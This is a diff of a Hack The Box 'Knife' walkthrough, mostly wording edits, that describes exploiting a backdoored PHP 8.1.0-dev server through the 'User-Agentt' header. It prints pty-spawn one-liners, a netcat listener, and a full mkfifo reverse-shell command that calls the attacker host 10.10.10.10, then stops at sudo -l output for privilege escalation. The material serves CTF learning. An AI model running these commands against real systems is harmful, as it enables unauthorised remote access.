Ros3tta/HTB-Writeups/Knife.md

 [12:10:44] 403 -  277B  - /server-status/
 ```
 # Vulnerability Assessment
-The server runs `Apache 2.4.41` and uses `PHP 8.1.0-dev`
+The server was running `Apache 2.4.41` and using `PHP 8.1.0-dev`
 Looking up `php 8.1.0 exploit` leads to this:
 https://www.exploit-db.com/exploits/49933

 The cause of the exploit was an early realease which contained a backdoor
-The backdoor was removed but any server that still runs this version, an attacker can execute arbitrary code by sending the `User-Agentt` header
+The backdoor was removed but any server that still runs this version allows an attacker to execute arbitrary code by sending the `User-Agentt` header
 # Exploitation
-Running the exploit, it asks for full URL: `http://10.10.10.242/`
+Running the exploit, it asked for full URL: `http://10.10.10.242/`
-It spawned pseudo shell
+After that it spawned `pseudo shell`
 # Post-Exploitation
-The job control is turned off so i couldnt spawn interactive shell no matter what i tried:
+The job control is turned off so i couldn't spawn interactive shell no matter what i tried:
 `/bin/sh -i`
 `python3 -c 'import pty; pty.spawn("/bin/sh")'`
 `perl —e 'exec "/bin/sh";'`

-In that case, i opened netcat listner on port 4444 and executed reverse shell on the pseudo shell
+In that case, i opened `netcat` listner on port 4444 and executed reverse shell on the `pseudo shell`
 `nc -lvnp 4444` (listener)
 `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 4444 >/tmp/f` (reverse shell)

-Having reverse shell from `nc`, i upgraded to interactive shell
+Having reverse shell from `nc`, i upgraded to `interactive shell`
 `python3 -c 'import pty; pty.spawn("/bin/sh")'`

-Browsing through directories, in the home directory there is only one called `james`, the flag can be found inside `/home/james/user.txt`
+There was only 1 directory inside `/home` called `james` (which is who we are - `whoami`), the user flag can be found inside `/home/james/user.txt`
-After that i started checking common things like the `sudo --version`, the `uname -a` but exploits didn't work
+After that i started checking common things but the exploits for them didn't work
+- `sudo --version` (sudo version)
+- `uname -a` (system information)

-Checking `sudo -l` to see what i can run as sudo led to this
+Running `sudo -l` to see what i can run as sudo led to this
 ```
 User james may run the following commands on knife:
     (root) NOPASSWD: /usr/bin/knife